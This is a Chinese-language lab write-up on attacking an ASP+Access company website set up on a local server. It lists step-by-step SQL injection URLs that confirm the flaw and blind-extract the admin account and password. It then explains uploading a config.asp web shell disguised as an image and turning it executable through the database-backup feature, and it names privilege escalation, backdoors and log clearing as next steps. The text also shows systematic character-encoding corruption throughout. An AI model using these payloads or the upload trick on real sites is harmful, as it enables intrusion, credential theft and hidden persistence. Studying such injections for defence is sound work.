實(shí)驗(yàn)十一：sql注入之a(chǎn)sp+access案例

僅供學(xué)習(xí)參考，2013.5.8日學(xué)習(xí)整理記錄

潛江水產(chǎn)案例
(sql注入之a(chǎn)sp+access)
實(shí)驗(yàn)?zāi)康耐ㄟ^(guò)注入漏洞上傳config.asp
實(shí)驗(yàn)過(guò)程如下所示：
實(shí)驗(yàn)前提：在服務(wù)器上要搭建好IIS
開(kāi)始實(shí)驗(yàn)
把已經(jīng)編好的web通過(guò)共享的方式上傳到服務(wù)器上，然后解壓這個(gè)潛江水產(chǎn)的數(shù)據(jù)包
文件，然后把這個(gè)數(shù)據(jù)包導(dǎo)入到c:\inetpub\wwwroot下面，接著通過(guò)命令行inetmgr打開(kāi)
搭建好的默認(rèn)網(wǎng)站，然后在默認(rèn)網(wǎng)站中的主目錄下面指定潛江水產(chǎn)的路徑，然后在配置中的設(shè)置中啟用父路徑，在指引中添加index.asp，然后在網(wǎng)絡(luò)擴(kuò)展中把a(bǔ)sp給啟動(dòng)
網(wǎng)站服務(wù)器一切準(zhǔn)備好后，在客戶端來(lái)訪問(wèn)一下潛江水產(chǎn)的服務(wù)器
現(xiàn)在我們就要利用編程的簡(jiǎn)單的查詢來(lái)推斷網(wǎng)站是否存在注入漏洞
訪問(wèn)網(wǎng)站后，在地址欄輸入：http：\192.168.2.4，然后在網(wǎng)頁(yè)中找到一個(gè)武漢水產(chǎn)專家，
當(dāng)出現(xiàn)地址為：http：//192.168.2.4/shownews.asp？id=41時(shí)，這就是典型的注入漏洞
我們可以用下面可以到shownews.asp中查看一下看有沒(méi)有“武漢水產(chǎn)專家”，發(fā)現(xiàn)找不到，說(shuō)明這個(gè)新聞頁(yè)面時(shí)保存在數(shù)據(jù)庫(kù)里面的
現(xiàn)在我們到數(shù)據(jù)庫(kù)中查詢一下“select”
下面是搭建好潛江水產(chǎn)的web頁(yè)面

http://192.168.2.4/shownews.asp？id=41查詢正常

我們可以用三種方法來(lái)確定它存在注入漏洞
1.http://192.168.2.4/shownews.asp？id=41’查詢不正常

2.http://192.168.2.4/shownews.asp? id=41 and 1=1查詢正常

3.http://192.168.2.4/shownews.asp? id=41 and 1=2查詢不正常

4.http://192.168.2.4/shownews.asp？id=41 and select username，password from user查詢報(bào)錯(cuò)

5.http://192.168.2.4/shownews.asp？id=41 and 0<>(select count(*) from admin)正常訪問(wèn)

6.http://192.168.2.4/shownews.asp？id=41 and 0<>(select count(*) from admin1)不正常訪問(wèn)

7.http://192.168.2.4/shownews.asp？id=41 and 0<>(select count(user) from admin)查詢正常

8.http://192.168.2.4/shownews.asp？id=41 and 0<>(select count(password) from admin)

9.http://192.168.2.4/shownews.asp？id=41 and （select top 1 len （user）from admin）>0 正常

10.http://192.168.2.4/shownews.asp？id=41 and （select top 1 len （user）from admin）>1正常

11.http://192.168.2.4/shownews.asp？id=41 and （select top 1 len （user）from admin）>2 正常，知道出現(xiàn)報(bào)錯(cuò)就是那個(gè)數(shù)，這樣一個(gè)一個(gè)的嘗試，直到出現(xiàn)報(bào)錯(cuò)時(shí)為止。那么密碼的長(zhǎng)度就為那個(gè)報(bào)錯(cuò)的位數(shù)，接下來(lái)就是猜密碼了

12.http：//192.168.1.10/shownews.asp？id=41 and （select top 1 asc（mid（user，1，1））from admin）>0出現(xiàn)錯(cuò)誤

13.http：//192.168.1.10/shownews.asp？id=41 and （select top 1 asc（ mid（username，1，1））from admin）>0正常

14.http：//192.168.1.10/shownews.asp？id=41 and （select top 1 len（username）from admin ）>1

15.http：//192.168.1.10/shownews.asp？id=41 and （select top 1 len（username）from admin ）>2 剛剛前面出現(xiàn)了問(wèn)題，現(xiàn)在又要重新的再來(lái)猜一遍，直到猜出報(bào)錯(cuò)時(shí)為止，那么密碼的長(zhǎng)度就為出現(xiàn)報(bào)錯(cuò)的那個(gè)數(shù)

16.http：//192.168.1.10/shownews.asp？id=41 and （select top 1 asc（mid（username，1，1））from admin）>0 現(xiàn)在來(lái)猜管理員的帳號(hào)

下面是用小葵來(lái)一步一步的破解密碼的過(guò)程

17.http://192.168.2.4/shownews.asp？id=41 and (select top 1 len （password）from admin) >0 現(xiàn)在猜密碼的長(zhǎng)度

18.http：//192.168.1.10/shownews.asp？id=41 and （select top 1 asc（mid（password，1，1））from admin）>0 現(xiàn)在就猜密碼為多少

下面是用小葵來(lái)一步一步的破解密碼

現(xiàn)在管理員的帳號(hào)已經(jīng)查出來(lái)了，管理員的密碼也猜出來(lái)了
接下來(lái)就要開(kāi)始注入了
在潛江水產(chǎn)網(wǎng)的下面找到“網(wǎng)站管理”，然后輸入管理員的帳號(hào)和密碼就可以直接訪問(wèn)后臺(tái)
然后找到新聞的編輯頁(yè)面，在這里面找到插入圖片，你就可以利用這個(gè)漏洞來(lái)上傳圖片，也就把config.asp這個(gè)文件傳上去了，但是這里文件只有jpg，gpf，那么你就要
回到客戶端，把config.asp的后綴名改為gpf或jpg內(nèi)型的，
然后找到這個(gè)文件存放的地方，在客戶端的地址欄中輸入這個(gè)地址，發(fā)現(xiàn)不能夠訪問(wèn)
然后在系統(tǒng)管理中找到上傳文件，然后找到數(shù)據(jù)庫(kù)備份，然后把文件備份一下，并找到備份的路徑
然后把圖片的路徑保存在當(dāng)前的數(shù)據(jù)庫(kù)下，然后把保存的數(shù)據(jù)庫(kù)的名稱的后綴名更改一下，
然后復(fù)制這個(gè)地址，然后在地址欄中輸入這個(gè)confi.asp文件的路徑

在這里需要把里面的內(nèi)容填寫(xiě)一下，然后再上傳，然后找到上傳后的路徑地址

下面就可以一步一步的通過(guò)config.asp來(lái)上傳文件，然后提權(quán)，然后遠(yuǎn)程登錄，然后做后門(mén)，然后清除日志等一系列的操作，在這里我就不演示了

總結(jié)：僅供學(xué)習(xí)參考，資料來(lái)源于2013.5.8日學(xué)習(xí)整理，請(qǐng)勿做違法犯禁事情，違者自咎，我只是提供一個(gè)學(xué)習(xí)平臺(tái)，僅供學(xué)習(xí)參考，希望大家把這個(gè)拿來(lái)作為公司的安全防護(hù)做漏洞測(cè)試，請(qǐng)勿用來(lái)作侵害他人財(cái)產(chǎn)或者經(jīng)濟(jì)損失及個(gè)人隱私安全泄露的事情，違者當(dāng)事人自負(fù)，注意，此僅僅是供學(xué)習(xí)參考借鑒使用，請(qǐng)勿做違法事情